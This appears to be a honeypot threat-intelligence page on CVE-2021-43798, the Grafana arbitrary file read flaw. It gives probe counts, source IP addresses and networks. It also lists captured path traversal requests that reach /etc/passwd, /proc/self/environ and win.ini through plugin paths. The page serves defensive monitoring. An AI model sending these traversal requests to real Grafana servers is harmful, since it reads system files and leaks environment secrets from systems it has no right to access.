CVE-2021-43798: Grafana v8.x - Arbitrary File Read

HoneyLabs honeypots recorded 2,628 probes matching CVE-2021-43798 from 8 distinct source IP addresses in the last 7 days. Severity is rated high.

This CVE is on CISA's Known Exploited Vulnerabilities list.

Request paths that identify it

  • /public/plugins
  • /public/plugins//../../../../../../../../../../../../../../../../../../windows/win.ini
  • /public/plugins//../../../../../../../../../../../../../../../../../../etc/passwd

Addresses probing it

Source IPProbesNetworkCountry
93.123.109.2142,600Techoff Srv LimitedBulgaria
136.90.54.1317Google LLCUnited States
35.187.246.1476Google LLCSingapore
207.175.110.403Google LLCBelgium
34.95.4.1983Google LLCCanada
34.89.245.2283Google LLCGermany
34.84.217.483Google LLCJapan
34.124.215.333Google LLCSingapore

Networks it comes from

ASNOrganisationProbesSource IPs
AS48090Techoff Srv Limited2,6001
AS396982Google LLC287

Captured requests

  • /public/plugins/abhisant-druid-datasource/../../../../../../../../../../../../../../../../../../windows/win.ini
  • /public/plugins/text/../../../../../../../../proc/self/environ
  • /public/plugins/grafana-clock-panel/../../../../../../../../proc/self/environ
  • /public/plugins/ae3e-plotly-panel/../../../../../../../../../../../../../../../../../../windows/win.ini

CVE report

CVE report

Open a specific CVE from the CVE tracker.